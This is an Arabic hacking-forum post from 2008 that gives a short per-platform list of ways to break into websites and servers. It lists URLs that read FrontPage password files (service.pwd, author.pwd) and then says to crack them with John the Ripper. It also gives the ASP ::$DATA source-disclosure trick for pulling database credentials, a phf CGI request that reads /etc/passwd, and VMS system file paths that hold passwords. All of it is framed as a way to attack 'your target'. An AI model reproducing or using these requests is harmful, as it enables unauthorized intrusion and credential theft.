ثغرات كل نظام

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

ثغرات كل نظام

مُساهمة من طرف Hacker في الخميس أغسطس 14, 2008 3:40 am

لقد قمت بتعريب الموضوع فقط لم فيه من الفائدة على الجميع وارجوا لكم الأستفادة :

النظام: اذا كان النظام يستخدم اوفيس فرونت بيج

الوظيفة: ضع الثغرة خلف العنوان مباشرة وعندك دخولك سوف تجد أسم المستخدم والباسورد مشفرة فقط قم بفك التشفير عن طريق جون ذا رباير

مثال: www.yourtarget.com/_vti_pvt/service.pwd
أو: www.yourtarget.com/_vti_pvt/author.pwd


النظام: اذا كان النظام يستخدم صفحات بامتداد .asp

الوظيفة: لدي مثال عن ثغرة ولكن ماذا تفعل عند دخولك الصفحة ؟ فقط قم باخراج مصدر الصفحة وستجد باسورد واسم المستخدم لقاعدة البيانات الخاصة بالموقع ويوجد ثغرة ستعقد انها تافه بعض الشيء ولكن يمكنك من خلاله اختراق المواقع وهي .


امثلة : www.whatever.com/default.asp.
أو: www.whatever.com/default.asp::dat

النظام: اذا كان الموقع يستخدم phf

الوظيفة: يمكنك الدخول من على الثغرة التي وضعتها بالمثال وسوف تجد ملف الشادو والباس وهذا يكفي لاختارقك الموقع

مثال: http://www.yourtarget.com/cgi-bin/p...t%20/etc/passwd


النظام: Vax أو Vms

الوظيفة: في ملف التشغيل

حاول بهذه: SYS$MANAGER:ANNOUNCE.TXT or SYS$Announce.txt


النظام: VMS

الوظيفة: سوف تجد الباسورد في

ألامر: sys$system:sysuaf.dat

نظرة علىalt 2600. إف أي كيو لبرنامجِ تخمينَ _ كلمة سر

_________________
لاــ الــه الاــ الـلـــه مــحــمد رســـــول الــلــه
avatar
Hacker

عدد المساهمات : 49
تاريخ التسجيل : 11/08/2007
العمر : 27
الموقع : www.v99x.com

معاينة صفحة البيانات الشخصي للعضو http://www.xp10.cc

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى